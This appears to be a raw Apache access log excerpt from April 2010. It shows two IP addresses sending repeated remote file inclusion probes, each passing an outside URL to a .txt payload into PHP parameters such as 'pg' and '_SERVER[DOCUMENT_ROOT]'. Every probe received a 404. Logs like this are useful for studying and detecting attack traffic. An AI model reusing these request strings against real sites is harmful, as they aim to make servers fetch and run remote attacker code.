209.216.43.133 - - [15/Apr/2010:21:57:33 -0500] "GET /logs/access_log.1244073600/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
217.73.17.92 - - [15/Apr/2010:21:57:47 -0500] "GET /index2.php?pg=http://hobbes.fdp.unimi.it/~ermesnet/hermes/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.73.17.92 - - [15/Apr/2010:21:57:47 -0500] "GET /logs/access_log.1219363200%20%20/index2.php?pg=http://hobbes.fdp.unimi.it/~ermesnet/hermes/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.73.17.92 - - [15/Apr/2010:21:57:47 -0500] "GET /logs/index2.php?pg=http://hobbes.fdp.unimi.it/~ermesnet/hermes/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.73.17.92 - - [15/Apr/2010:21:57:48 -0500] "GET /index2.php?pg=http://hobbes.fdp.unimi.it/~ermesnet/hermes/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.73.17.92 - - [15/Apr/2010:21:57:48 -0500] "GET /logs/access_log.1219363200%20%20/index2.php?pg=http://hobbes.fdp.unimi.it/~ermesnet/hermes/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
